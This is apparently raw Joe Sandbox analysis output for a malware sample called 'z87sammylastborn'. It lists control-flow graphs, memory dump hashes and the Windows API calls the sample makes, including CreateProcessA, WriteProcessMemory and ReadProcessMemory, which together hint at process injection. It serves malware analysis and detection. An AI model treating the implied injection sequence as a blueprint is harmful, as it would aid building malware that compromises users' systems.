                                                                                        control_flow_graph 406 507a6a0-507a6d1 407 507a6d3 406->407 408 507a6d8-507a84c 406->408 407->408 526 507a84f call 507a30c 408->526 527 507a84f call 507a318 408->527 413 507a851-507a871 414 507a8b5-507a91f 413->414 415 507a873-507a8aa 413->415 422 507a926-507a952 414->422 423 507a921 414->423 415->414 425 507a9dd-507aa18 422->425 426 507a958-507a96e 422->426 423->422 429 507aa5b 425->429 430 507aa1a-507aa50 425->430 542 507a971 call 5079ef2 426->542 543 507a971 call 5079ef8 426->543 428 507a973-507a993 431 507a9d6-507a9d8 428->431 432 507a995-507a9cb 428->432 433 507aa5c-507aa66 429->433 430->429 431->433 432->431 434 507aa6d-507aa98 433->434 435 507aa68 433->435 532 507aa9b call 507a180 434->532 533 507aa9b call 507a178 434->533 435->434 438 507aa9d-507aabd 441 507ab00-507ab19 438->441 442 507aabf-507aaf5 438->442 443 507abc0-507ac1e 441->443 444 507ab1f-507ab7c 441->444 442->441 530 507ac21 call 5079fd0 443->530 531 507ac21 call 5079fca 443->531 453 507abbf 444->453 454 507ab7e-507abb4 444->454 453->443 454->453 456 507ac23-507ac49 457 507ace4-507ad00 456->457 458 507ac4f-507aca0 456->458 534 507ad03 call 507a090 457->534 535 507ad03 call 507a08a 457->535 465 507ace3 458->465 466 507aca2-507acd8 458->466 460 507ad05-507ad25 463 507ad27-507ad5d 460->463 464 507ad68-507ad9d 460->464 463->464 471 507af0f-507af2b 464->471 465->457 466->465 472 507ada2-507ae26 471->472 473 507af31-507af6a 471->473 485 507af04-507af09 472->485 486 507ae2c-507ae9b 472->486 538 507af6d call 507a090 473->538 539 507af6d call 507a08a 473->539 480 507af6f-507af8f 482 507afd2-507b002 480->482 483 507af91-507afc7 480->483 489 507b004-507b007 482->489 490 507b00a-507b01a 482->490 483->482 485->471 536 507ae9e call 507a090 486->536 537 507ae9e call 507a08a 486->537 489->490 491 507b021-507b04c 490->491 492 507b01c 490->492 498 507b0d7-507b112 491->498 499 507b052-507b068 491->499 492->491 505 507b155 498->505 506 507b114-507b14a 498->506 540 507b06b call 5079ef2 499->540 541 507b06b call 5079ef8 499->541 500 507aea0-507aec0 502 507af03 500->502 503 507aec2-507aef8 500->503 502->485 503->502 504 507b06d-507b08d 507 507b0d0-507b0d2 504->507 508 507b08f-507b0c5 504->508 509 507b156-507b165 505->509 506->505 507->509 508->507 528 507b168 call 5079e42 509->528 529 507b168 call 5079e48 509->529 513 507b16a-507b18a 515 507b1cd-507b23d 513->515 516 507b18c-507b1c2 513->516 516->515 526->413 527->413 528->513 529->513 530->456 531->456 532->438 533->438 534->460 535->460 536->500 537->500 538->480 539->480 540->504 541->504 542->428 543->428
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (
                                                                                        • API String ID: 0-3887548279
                                                                                        • Opcode ID: 4b135ca26c67ae13b0a78943587843c2351c4f7159190a09fd8bc587c5ebc8a9
                                                                                        • Instruction ID: 6e809990b37a0a9ceb029ea5732914be867d54ce47a376e1e04e720451fb6ebf
                                                                                        • Opcode Fuzzy Hash: 4b135ca26c67ae13b0a78943587843c2351c4f7159190a09fd8bc587c5ebc8a9
                                                                                        • Instruction Fuzzy Hash: 8362C374E012288FDB64DF69C994BDDBBB2BF89304F1081E9D409AB295DB359E85CF40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3e5798699027bfd4dde93119a7808178feb2e6afacee4d1cc65097783dc6c542
                                                                                        • Instruction ID: 7207b7bd294776346ba92d6c38ef83168f0469ca1ca8f7368f1bf6067f29940c
                                                                                        • Opcode Fuzzy Hash: 3e5798699027bfd4dde93119a7808178feb2e6afacee4d1cc65097783dc6c542
                                                                                        • Instruction Fuzzy Hash: F742D570E012288FDB64DF69C954BDDBBB2BF89304F1481EAD409AB295DB359E85CF40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085374836.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6c50000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 411915ab7cca12a901459814d0b6bce4ae440fadfa3570ff85ec12a3cd3d4820
                                                                                        • Instruction ID: 7336a65ffbfda9b1c94eb42c32f772ac96692f60d9877c751eff071f87575115
                                                                                        • Opcode Fuzzy Hash: 411915ab7cca12a901459814d0b6bce4ae440fadfa3570ff85ec12a3cd3d4820
                                                                                        • Instruction Fuzzy Hash: 49F12C70E00209CFDB54DFA9C948B9DBBF1FF88304F1A8169D805AB765DB749985CB84
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 354082fdf892821fe5331778c39a459da0d79ed703002a615170b592aec9eabc
                                                                                        • Instruction ID: 401686843993e3e66a48ad74d90930a349ffab423a60a1240d22bdfd3d5cf0bf
                                                                                        • Opcode Fuzzy Hash: 354082fdf892821fe5331778c39a459da0d79ed703002a615170b592aec9eabc
                                                                                        • Instruction Fuzzy Hash: A2D1BA71B006098FEB69DB75D460BAE77FABF89300F148469E046CB291DB39ED02CB55
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4f86ebb4de9d4f6e55b9ba89b8401ab709a2193ffbbc2d724299c1fb2b4de6c8
                                                                                        • Instruction ID: cef9b6f7792f4b3a9e75fdd60a2b186e6c61c0f5a57a4c4a03aacdfd38cfc331
                                                                                        • Opcode Fuzzy Hash: 4f86ebb4de9d4f6e55b9ba89b8401ab709a2193ffbbc2d724299c1fb2b4de6c8
                                                                                        • Instruction Fuzzy Hash: 1361C174E05218CFCB14CFAAD594AADFBF2BF89300F24916AD815AB355DB349842CF54
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8f97d425b7766e8f4a33ccf6b2b9b5b3ce1d3fb2f19c6b0c352425ca53870634
                                                                                        • Instruction ID: a2e067d8ac95dd8531760c0c387a3a312c3f29c9ebb0fb93ba0d0e67fb257227
                                                                                        • Opcode Fuzzy Hash: 8f97d425b7766e8f4a33ccf6b2b9b5b3ce1d3fb2f19c6b0c352425ca53870634
                                                                                        • Instruction Fuzzy Hash: 2571E4B4E00218CFDB14DFA9D5846AEBBF2FF89300F208569E815AB364DB349945CF54
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7074dffc09a7093392e8f00d70cb3c8e02da8f50e2ace768cbd52f165b23d7f3
                                                                                        • Instruction ID: 0d092377ffbdceab075bad3d32d14da1f32fbb652b560577f07f4cdc024b96d6
                                                                                        • Opcode Fuzzy Hash: 7074dffc09a7093392e8f00d70cb3c8e02da8f50e2ace768cbd52f165b23d7f3
                                                                                        • Instruction Fuzzy Hash: 7B31D4B5E012188FDB18CFAAD5846DDBBF2FF89310F14C06AD808AB254DB755946CF14

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 294 cad540-cad5cf GetCurrentProcess 298 cad5d8-cad60c GetCurrentThread 294->298 299 cad5d1-cad5d7 294->299 300 cad60e-cad614 298->300 301 cad615-cad649 GetCurrentProcess 298->301 299->298 300->301 302 cad64b-cad651 301->302 303 cad652-cad66a 301->303 302->303 307 cad673-cad6a2 GetCurrentThreadId 303->307 308 cad6ab-cad70d 307->308 309 cad6a4-cad6aa 307->309 309->308
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 00CAD5BE
                                                                                        • GetCurrentThread.KERNEL32 ref: 00CAD5FB
                                                                                        • GetCurrentProcess.KERNEL32 ref: 00CAD638
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00CAD691
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2082103434.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ca0000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: 8910d13e46b386f77c1f9cd76291868f05fbada2cca94cf42b12625b79523922
                                                                                        • Instruction ID: 471791cde10424e2b9cca0ebe329debd1d8d0abe7960180e42243cae3bad9e5a
                                                                                        • Opcode Fuzzy Hash: 8910d13e46b386f77c1f9cd76291868f05fbada2cca94cf42b12625b79523922
                                                                                        • Instruction Fuzzy Hash: D05157B09002498FDB18DFA9D548B9EBBF5FF89308F20C459E01AA7360D7785984CB65

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 544 507a30c-507a3ad 547 507a3e6-507a406 544->547 548 507a3af-507a3b9 544->548 553 507a43f-507a46e 547->553 554 507a408-507a412 547->554 548->547 549 507a3bb-507a3bd 548->549 551 507a3e0-507a3e3 549->551 552 507a3bf-507a3c9 549->552 551->547 555 507a3cd-507a3dc 552->555 556 507a3cb 552->556 564 507a4a7-507a561 CreateProcessA 553->564 565 507a470-507a47a 553->565 554->553 557 507a414-507a416 554->557 555->555 558 507a3de 555->558 556->555 559 507a439-507a43c 557->559 560 507a418-507a422 557->560 558->551 559->553 562 507a426-507a435 560->562 563 507a424 560->563 562->562 566 507a437 562->566 563->562 576 507a563-507a569 564->576 577 507a56a-507a5f0 564->577 565->564 567 507a47c-507a47e 565->567 566->559 569 507a4a1-507a4a4 567->569 570 507a480-507a48a 567->570 569->564 571 507a48e-507a49d 570->571 572 507a48c 570->572 571->571 573 507a49f 571->573 572->571 573->569 576->577 587 507a5f2-507a5f6 577->587 588 507a600-507a604 577->588 587->588 589 507a5f8 587->589 590 507a606-507a60a 588->590 591 507a614-507a618 588->591 589->588 590->591 594 507a60c 590->594 592 507a61a-507a61e 591->592 593 507a628-507a62c 591->593 592->593 595 507a620 592->595 596 507a63e-507a645 593->596 597 507a62e-507a634 593->597 594->591 595->593 598 507a647-507a656 596->598 599 507a65c 596->599 597->596 598->599 601 507a65d 599->601 601->601
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0507A54E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 7b593d8c164d68017e3736b0c2957b314deb5373ce28e19b89609967fcb667f6
                                                                                        • Instruction ID: dc7f3a2620c3a82e042415011c49519c6941611b7c0278d75403da84210cba1b
                                                                                        • Opcode Fuzzy Hash: 7b593d8c164d68017e3736b0c2957b314deb5373ce28e19b89609967fcb667f6
                                                                                        • Instruction Fuzzy Hash: BAA16971E00219DFDB20DFA8D845BAEBBF2BF48310F148169E809A7290DB759981CF95

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 602 507a318-507a3ad 604 507a3e6-507a406 602->604 605 507a3af-507a3b9 602->605 610 507a43f-507a46e 604->610 611 507a408-507a412 604->611 605->604 606 507a3bb-507a3bd 605->606 608 507a3e0-507a3e3 606->608 609 507a3bf-507a3c9 606->609 608->604 612 507a3cd-507a3dc 609->612 613 507a3cb 609->613 621 507a4a7-507a561 CreateProcessA 610->621 622 507a470-507a47a 610->622 611->610 614 507a414-507a416 611->614 612->612 615 507a3de 612->615 613->612 616 507a439-507a43c 614->616 617 507a418-507a422 614->617 615->608 616->610 619 507a426-507a435 617->619 620 507a424 617->620 619->619 623 507a437 619->623 620->619 633 507a563-507a569 621->633 634 507a56a-507a5f0 621->634 622->621 624 507a47c-507a47e 622->624 623->616 626 507a4a1-507a4a4 624->626 627 507a480-507a48a 624->627 626->621 628 507a48e-507a49d 627->628 629 507a48c 627->629 628->628 630 507a49f 628->630 629->628 630->626 633->634 644 507a5f2-507a5f6 634->644 645 507a600-507a604 634->645 644->645 646 507a5f8 644->646 647 507a606-507a60a 645->647 648 507a614-507a618 645->648 646->645 647->648 651 507a60c 647->651 649 507a61a-507a61e 648->649 650 507a628-507a62c 648->650 649->650 652 507a620 649->652 653 507a63e-507a645 650->653 654 507a62e-507a634 650->654 651->648 652->650 655 507a647-507a656 653->655 656 507a65c 653->656 654->653 655->656 658 507a65d 656->658 658->658
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0507A54E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 0f7a9f9095cc6ca39950810cfa14a6a5a9fb21909e4f9dfab41fb9fb036a99e3
                                                                                        • Instruction ID: bee36616521d6860120d3f32cfc263d7fbdb88f9b63738d43750ee836230eb9d
                                                                                        • Opcode Fuzzy Hash: 0f7a9f9095cc6ca39950810cfa14a6a5a9fb21909e4f9dfab41fb9fb036a99e3
                                                                                        • Instruction Fuzzy Hash: C9914871E0021DDFDB20DFA8D845BAEBBF2BF48310F148169E809A7290DB759985CF95

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 659 cab298-cab2b7 660 cab2b9-cab2c6 call caaf38 659->660 661 cab2e3-cab2e7 659->661 666 cab2c8 660->666 667 cab2dc 660->667 662 cab2fb-cab33c 661->662 663 cab2e9-cab2f3 661->663 670 cab349-cab357 662->670 671 cab33e-cab346 662->671 663->662 714 cab2ce call cab538 666->714 715 cab2ce call cab540 666->715 667->661 673 cab37b-cab37d 670->673 674 cab359-cab35e 670->674 671->670 672 cab2d4-cab2d6 672->667 675 cab418-cab4d8 672->675 676 cab380-cab387 673->676 677 cab369 674->677 678 cab360-cab367 call caaf44 674->678 709 cab4da-cab4dd 675->709 710 cab4e0-cab50b GetModuleHandleW 675->710 681 cab389-cab391 676->681 682 cab394-cab39b 676->682 680 cab36b-cab379 677->680 678->680 680->676 681->682 684 cab3a8-cab3b1 call caaf54 682->684 685 cab39d-cab3a5 682->685 690 cab3be-cab3c3 684->690 691 cab3b3-cab3bb 684->691 685->684 692 cab3e1-cab3ee 690->692 693 cab3c5-cab3cc 690->693 691->690 700 cab3f0-cab40e 692->700 701 cab411-cab417 692->701 693->692 695 cab3ce-cab3de call caaf64 call caaf74 693->695 695->692 700->701 709->710 711 cab50d-cab513 710->711 712 cab514-cab528 710->712 711->712 714->672 715->672
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00CAB4FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2082103434.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ca0000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: 2e7fcb61c841eeb300aa9d5f6ee868fd4237a6fa6d0d8f04a8589d9faf04a531
                                                                                        • Instruction ID: 0538486e1c82ef00637ca5dfc472cc8de7f60ad694e7f775e80d1a81354e2abe
                                                                                        • Opcode Fuzzy Hash: 2e7fcb61c841eeb300aa9d5f6ee868fd4237a6fa6d0d8f04a8589d9faf04a531
                                                                                        • Instruction Fuzzy Hash: 83818A70A00B468FDB24CF69D44079ABBF1FF89304F10892EE09AD7A51DB79E945CB90

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 716 507437c-507eceb 719 507ecf2-507ed0e 716->719 720 507eced 716->720 722 507ed14-507ed29 719->722 723 507ef01-507ef2e 719->723 720->719 724 507ed2b-507ed33 call 507db54 722->724 725 507ed38-507ed64 GetCurrentThreadId 722->725 733 507ef2f 723->733 738 507eef9 724->738 728 507ed66-507ed6c 725->728 729 507ed6d-507ed82 725->729 728->729 730 507ed84-507ed8b 729->730 731 507eddd-507ee16 729->731 736 507ed95-507ed98 call 507e880 730->736 737 507ed8d-507ed90 call 507438c 730->737 739 507ee2b-507ee32 731->739 740 507ee18-507ee1c 731->740 733->733 745 507ed9d-507edc4 736->745 737->736 738->723 743 507ee34 739->743 744 507ee3a-507ee60 739->744 762 507ee1d call 6c527d0 740->762 763 507ee1d call 6c527c2 740->763 743->744 749 507ee67-507eeb0 744->749 750 507ee62 744->750 752 507edc6-507edcc 745->752 753 507edda 745->753 746 507ee23-507ee28 746->739 760 507eeb2 749->760 761 507eeba 749->761 750->749 752->753 755 507edce-507edd5 call 507e890 752->755 753->731 755->753 760->761 761->738 762->746 763->746
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0507ED50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentThread
                                                                                        • String ID:
                                                                                        • API String ID: 2882836952-0
                                                                                        • Opcode ID: 7f28fe6b5cf360d19e03060a5d17c7d229bcb3afe844d8f3d43bd00a693b7089
                                                                                        • Instruction ID: 31e6fa32369eaa34c50117458de8c9491880a53a990e8cf64501041bbba1c632
                                                                                        • Opcode Fuzzy Hash: 7f28fe6b5cf360d19e03060a5d17c7d229bcb3afe844d8f3d43bd00a693b7089
                                                                                        • Instruction Fuzzy Hash: 1B615870E0521DDFDB14DFA9E494BADBBBAFF48300F1084A9E415AB391CB35A885CB54

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 890 6c51145-6c52102 893 6c52104-6c5210c 890->893 894 6c5210e-6c5213e EnumThreadWindows 890->894 893->894 895 6c52147-6c52174 894->895 896 6c52140-6c52146 894->896 896->895
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085374836.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6c50000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a498f502c3f616359abb4921281f63fc698473b5de2597be015430e480774407
                                                                                        • Instruction ID: 1a3939ae4bf3c4735b6fead7c9fc7f85e1aa2f195265889b317948d114310981
                                                                                        • Opcode Fuzzy Hash: a498f502c3f616359abb4921281f63fc698473b5de2597be015430e480774407
                                                                                        • Instruction Fuzzy Hash: 1931D072C053958FDB01DFA9C8507DEBFF4EF55320F04806AD484A7252D7389A45CBA9

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 917 4fa1334-4fa43dc 920 4fa448c-4fa44ac call 4fa120c 917->920 921 4fa43e2-4fa43e7 917->921 929 4fa44af-4fa44bc 920->929 922 4fa443a-4fa4472 CallWindowProcW 921->922 923 4fa43e9-4fa4420 921->923 925 4fa447b-4fa448a 922->925 926 4fa4474-4fa447a 922->926 931 4fa4429-4fa4438 923->931 932 4fa4422-4fa4428 923->932 925->929 926->925 931->929 932->931
                                                                                        APIs
                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 04FA4461
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2084764830.0000000004FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_4fa0000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallProcWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2714655100-0
                                                                                        • Opcode ID: e49a2e546f15fe0e51ca350dffed0b99b7e4c6e3fb0ef647db5c9708d2beb25c
                                                                                        • Instruction ID: 72369b56b9460418954dba3ee0d4256cbc837ceaf202daf10038701cc98fd0ab
                                                                                        • Opcode Fuzzy Hash: e49a2e546f15fe0e51ca350dffed0b99b7e4c6e3fb0ef647db5c9708d2beb25c
                                                                                        • Instruction Fuzzy Hash: 5A4119B5A00205DFDB14CF99C488AABBBF5FF89318F24C459D919A7321D375A851CBA0

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 900 ca590c-ca5914 901 ca591c-ca59d9 CreateActCtxA 900->901 903 ca59db-ca59e1 901->903 904 ca59e2-ca5a3c 901->904 903->904 911 ca5a4b-ca5a4f 904->911 912 ca5a3e-ca5a41 904->912 913 ca5a60 911->913 914 ca5a51-ca5a5d 911->914 912->911 916 ca5a61 913->916 914->913 916->916
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 00CA59C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2082103434.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ca0000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: c2a45cfa43ac18119a801c2b0f1849b342c6b9612510ef668f361f98f8024f5e
                                                                                        • Instruction ID: 17dd2df8d70ed0196a4666aaeaf2f9b3e2003ef682cd58027fb7fc1bd6d6dacb
                                                                                        • Opcode Fuzzy Hash: c2a45cfa43ac18119a801c2b0f1849b342c6b9612510ef668f361f98f8024f5e
                                                                                        • Instruction Fuzzy Hash: 4441F2B0D00719CEDB28DFA9C9847DEBBB5BF49304F20806AD418AB295DB756946CF90
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 00CA59C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2082103434.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ca0000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: d45029bc5a78e642f5f8f257798eaf51ebc584f9b707c504ec34a5db6ae0495a
                                                                                        • Instruction ID: 208c566429f60628aaf4981216635430443edaf93323bd1538e08a65467e83a3
                                                                                        • Opcode Fuzzy Hash: d45029bc5a78e642f5f8f257798eaf51ebc584f9b707c504ec34a5db6ae0495a
                                                                                        • Instruction Fuzzy Hash: 8941F2B0D00719CBDB24DFAAC844B9EBBB5FF49304F20806AD418AB255DB756946CF90
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04FA1EE2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2084764830.0000000004FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_4fa0000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: 7a2295dd0f68509bf55dd907928072d922a5aa2547805dc7b556d974ce91e48f
                                                                                        • Instruction ID: 4ee5d783960b83f790f4164d9d6c18c31f4f84bac5ebb57e0712373bb4e417db
                                                                                        • Opcode Fuzzy Hash: 7a2295dd0f68509bf55dd907928072d922a5aa2547805dc7b556d974ce91e48f
                                                                                        • Instruction Fuzzy Hash: EE31F7B1D00249DFDF15CF99C984ADEBBB1FF88314F15811AE818AB250DB75A895CF90
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0507A120
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 11c060f309877943c2b23e2b0128654d1da2a95e8645b5e4f2193283b88c0de0
                                                                                        • Instruction ID: e6bcff50a0564921616423eb655f3cc3eb0dab2d5f2851aa4d51847a7284e4a4
                                                                                        • Opcode Fuzzy Hash: 11c060f309877943c2b23e2b0128654d1da2a95e8645b5e4f2193283b88c0de0
                                                                                        • Instruction Fuzzy Hash: 5F2127B1D003099FDB10DFA9D885BEEBBF5FF48310F148429E919A7250C7789944CBA4
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0507A120
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 1db47bc637a870df82fac61d414c78ac2f35ea1b0f0541b85110b65c63374724
                                                                                        • Instruction ID: 38f5bdbfa9ba74c193fe6b5b41db31d80cdbaee90975300d6f7f0924fcb5b224
                                                                                        • Opcode Fuzzy Hash: 1db47bc637a870df82fac61d414c78ac2f35ea1b0f0541b85110b65c63374724
                                                                                        • Instruction Fuzzy Hash: 402105B1D003499FDB10DFAAD885BEEBBF5FF48310F54842AE919A7250C7789944CBA4
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0507A200
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: bb76478d2c6069557e64d5d03d859fec7f3fcf927e1ab3c91e38cc91c3927dc5
                                                                                        • Instruction ID: d8c491bef3ca5b4ed085b372eea49a7b291066237d8892f7c8a2092b6eacf125
                                                                                        • Opcode Fuzzy Hash: bb76478d2c6069557e64d5d03d859fec7f3fcf927e1ab3c91e38cc91c3927dc5
                                                                                        • Instruction Fuzzy Hash: 4E2139B1D002499FCB10DFAAC881AEEFBF5FF48310F10842AE519A7250C7399945CBA4
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 06C52052
                                                                                        Memory Dump Source
